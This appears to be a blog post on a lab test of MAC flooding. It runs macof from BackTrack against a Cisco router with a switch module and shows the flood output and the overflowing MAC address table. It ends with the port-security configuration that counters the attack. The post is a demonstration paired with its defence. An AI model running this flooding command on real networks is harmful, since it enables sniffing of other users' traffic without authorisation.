network – cisco mac flood

macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing)

root@bt:~# macof -i tap0

OPTIONS

-i interface     Specify the interface to send on.
-s src     Specify source IP address.
-d dst     Specify destination IP address.
-e tha     Specify target hardware address.
-x sport     Specify TCP source port.
-y dport     Specify TCP destination port.
-n times     Specify the number of packets to send.
Values for any options left unspecified will be generated randomly.

root@bt:~# macof -i tap0
96:51:2c:1c:c8:63 c:fe:b8:63:15:7 0.0.0.0.19081 > 0.0.0.0.64278: S 1230174330:1230174330(0) win 512
23:ae:fd:46:27:db e4:31:3:48:20:d5 0.0.0.0.60050 > 0.0.0.0.60848: S 112547810:112547810(0) win 512
ed:58:5:77:f3:18 4b:3f:4c:4e:23:4e 0.0.0.0.57838 > 0.0.0.0.12575: S 1632267000:1632267000(0) win 512
1f:a1:2d:24:6:3a c3:52:d0:66:12:a7 0.0.0.0.57635 > 0.0.0.0.35747: S 6820533:6820533(0) win 512
2e:ec:5b:63:3e:8 19:f8:fe:5:71:49 0.0.0.0.25686 > 0.0.0.0.18417: S 118449652:118449652(0) win 512
2b:90:9c:36:f6:3c a1:a8:3f:33:5f:d4 0.0.0.0.65280 > 0.0.0.0.27911: S 1304230507:1304230507(0) win 512
ca:a8:9:1a:76:d d:e6:3c:1f:66:fc 0.0.0.0.37998 > 0.0.0.0.5548: S 2144916016:2144916016(0) win 512
6d:26:2f:12:93:21 a9:31:21:7e:b5:36 0.0.0.0.13831 > 0.0.0.0.20315: S 291357629:291357629(0) win 512
41:e8:7:2a:e2:9b a2:31:5f:2e:29:ee 0.0.0.0.1331 > 0.0.0.0.61251: S 1679324170:1679324170(0) win 512
63:b:25:2f:f6:9a 51:60:7f:7a:d2:3f 0.0.0.0.34358 > 0.0.0.0.43979: S 1437028189:1437028189(0) win 512
4d:e7:a:6c:a1:dd ca:f8:8:1:22:83 0.0.0.0.4171 > 0.0.0.0.51805: S 680528803:680528803(0) win 512
df:13:8a:59:7c:46 58:b7:f0:49:6a:4d 0.0.0.0.47236 > 0.0.0.0.47576: S 607304860:607304860(0) win 512
e7:13:4c:73:57:1b 10:f4:8c:37:4:e2 0.0.0.0.29021 > 0.0.0.0.24928: S 1809351406:1809351406(0) win 512
16:5c:89:5d:1e:c2 6a:d4:99:1f:72:b3 0.0.0.0.38986 > 0.0.0.0.21900: S 1222511066:1222511066(0) win 512
53:86:9e:34:21:40 a2:29:57:69:3a:bc 0.0.0.0.11718 > 0.0.0.0.17937: S 65928585:65928585(0) win 512
a9:9d:e:39:ab:88 ff:9c:ed:c:56:2 0.0.0.0.50512 > 0.0.0.0.56332: S 1851553817:1851553817(0) win 512
8a:f3:e4:7e:16:20 56:8b:e0:6a:72:e6 0.0.0.0.28365 > 0.0.0.0.27603: S 1603809643:1603809643(0) win 512
ea:88:66:2f:f5:cb 44:58:63:29:4a:cb 0.0.0.0.37609 > 0.0.0.0.13814: S 1398309356:1398309356(0) win 512
cd:e2:be:61:fc:2b f0:6f:1c:2d:78:ee 0.0.0.0.62349 > 0.0.0.0.29602: S 1497598597:1497598597(0) win 512
96:70:24:37:38:d6 84:22:96:57:f1:1d 0.0.0.0.22888 > 0.0.0.0.43897: S 448110272:448110272(0) win 512
40:b1:bf:3b:c7:71 9e:f3:c3:42:a7:6e 0.0.0.0.64986 > 0.0.0.0.20475: S 2108880598:2108880598(0) win 512
ac:99:b0:4a:15:39 85:66:97:18:69:81 0.0.0.0.2341 > 0.0.0.0.39707: S 968976208:968976208(0) win 512

testing the mac address flood against a cisco C3640 router with a NM-16ESW card to simulate switch.

Config on the router to allow access from bt5 r1 to the vlan interface via FastEthernet0/15

interface FastEthernet0/15
switchport access vlan 2

!
interface Vlan2
ip address 192.168.1.2 255.255.255.0

Looking at all mac-address presently recorded on the switch before using macof

Router#sh mac-address-table
Destination Address  Address Type  VLAN  Destination Port
——————-  ————  —-  ——————–
cc05.3ee8.0000        Self          1        Vlan1
cc05.3ee8.0000        Self          2        Vlan2
2a37.0f82.f878        Dynamic          2        FastEthernet0/15

Router#

looking at all dynamic gained mac address before macof

Router#sh mac-address-table dynamic
Non-static Address Table:
Destination Address  Address Type  VLAN  Destination Port
——————-  ————  —-  ——————–
2a37.0f82.f878        Dynamic          2        FastEthernet0/15

Router#

Looking at the dynamic gained address after using macof, as you can see it has flooded the switch.

Router#sh mac-address-table dynamic
Non-static Address Table:
Destination Address  Address Type  VLAN  Destination Port
——————-  ————  —-  ——————–
5ee6.5f7d.ccf4        Dynamic          2        FastEthernet0/15
b2b0.dc64.650d        Dynamic          2        FastEthernet0/15
bab6.b235.3d91        Dynamic          2        FastEthernet0/15
9e20.d426.3f70        Dynamic          2        FastEthernet0/15
761b.077c.aad3        Dynamic          2        FastEthernet0/15
b8f3.f81a.c9b7        Dynamic          2        FastEthernet0/15
aaad.6b6e.d7da        Dynamic          2        FastEthernet0/15
c0a9.a10a.a94a        Dynamic          2        FastEthernet0/15
fe83.5900.d1ce        Dynamic          2        FastEthernet0/15
ea3c.f41c.cfea        Dynamic          2        FastEthernet0/15
98c0.a45f.045a        Dynamic          2        FastEthernet0/15
ae09.ae40.2e71        Dynamic          2        FastEthernet0/15
8c7a.c82c.b7c9        Dynamic          2        FastEthernet0/15
20cf.c067.5172        Dynamic          2        FastEthernet0/15
f8a1.0052.90fe        Dynamic          2        FastEthernet0/15
404e.5157.ead2        Dynamic          2        FastEthernet0/15
4414.811a.e796        Dynamic          2        FastEthernet0/15
a84e.1f1f.0ae9        Dynamic          2        FastEthernet0/15
a880.8e61.a76f        Dynamic          2        FastEthernet0/15
12f8.7272.6641        Dynamic          2        FastEthernet0/15
52fb.5633.f0b3        Dynamic          2        FastEthernet0/15
f6a5.0e2f.8bb7        Dynamic          2        FastEthernet0/15
8001.736a.301e        Dynamic          2        FastEthernet0/15
d692.681b.eed3        Dynamic          2        FastEthernet0/15
eafb.2046.5451        Dynamic          2        FastEthernet0/15
fad9.7e23.76cc        Dynamic          2        FastEthernet0/15
ac5a.c333.00e3        Dynamic          2        FastEthernet0/15
981b.ad4e.0d89        Dynamic          2        FastEthernet0/15
ee53.3b67.ef91        Dynamic          2        FastEthernet0/15
8e73.d310.e4b0        Dynamic          2        FastEthernet0/15
30dd.2d71.716c        Dynamic          2        FastEthernet0/15
8a2f.9c5e.ce33        Dynamic          2        FastEthernet0/15
0433.9a59.d5ed        Dynamic          2        FastEthernet0/15
06c4.cf15.47da        Dynamic          2        FastEthernet0/15
d806.ff17.4c3c        Dynamic          2        FastEthernet0/15
ccce.9014.e17d        Dynamic          2        FastEthernet0/15
3a3b.4d4e.5079        Dynamic          2        FastEthernet0/15
f848.b50f.9675        Dynamic          2        FastEthernet0/15
7658.cd1f.06de        Dynamic          2        FastEthernet0/15
845d.1b39.c7c2        Dynamic          2        FastEthernet0/15
c289.063a.a9ce        Dynamic          2        FastEthernet0/15
6869.301e.a975        Dynamic          2        FastEthernet0/15
a204.cb3c.b2cb        Dynamic          2        FastEthernet0/15
5e1a.df7a.6d18        Dynamic          2        FastEthernet0/15
acb1.fa6a.da0a        Dynamic          2        FastEthernet0/15
88dd.5e76.5f27        Dynamic          2        FastEthernet0/15
3048.8026.4f40        Dynamic          2        FastEthernet0/15
00f6.793c.4bf7        Dynamic          2        FastEthernet0/15
2e41.e730.fca2        Dynamic          2        FastEthernet0/15
0468.9230.0558        Dynamic          2        FastEthernet0/15
e0a7.c320.8e52        Dynamic          2        FastEthernet0/15
56ca.9875.300c        Dynamic          2        FastEthernet0/15
0877.d252.7ce8        Dynamic          2        FastEthernet0/15
6038.4c58.ee3b        Dynamic          2        FastEthernet0/15
1a22.6262.4702        Dynamic          2        FastEthernet0/15
44b7.bd6d.62d7        Dynamic          2        FastEthernet0/15

The fix is to enable switchport port-security and limit the number of mac-address that can be connected to any one interface.

router# conf t
router(config)# interface fastethernet0/1
router(config-if)# switchport mode access
router(config-if)# switchport port-security
router(config-if)# switchport port-security maximum 10
router(config-if)# switchport port-security violation restrict
router(config-if)# switchport port-security mac-address aaaa.aaaa.aaaa
router(config-if)# switchport port-security mac-address bbbb.bbbb.bbbb

switchport mode access: The port-security works only on access port,  so define it.
switchport port-security: Enable port security on the interface.
switchport port-security maximum 10: Sets the maximum number of secure MAC addresses for the interface to 10.
switchport port-security violation restrict: It defines to “restrict” the violation mode.
switchport port-security mac-address aaaa.aaaa.aaaa: Define the static MAC address; remember that if you configure fewer secure MAC addresses than the maximum, the remaining MAC addresses are dynamically learned.

switchport port-security violation options

protect—Drops packets with unknown source addresses until you remove a sufficient number of
secure MAC addresses to drop below the maximum value.

restrict—Drops packets with unknown source addresses until you remove a sufficient number of
secure MAC addresses to drop below the maximum value and causes the SecurityViolation counter
to increment.

shutdown—Puts the interface into the error-disabled state immediately and sends an SNMP trap
notification.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s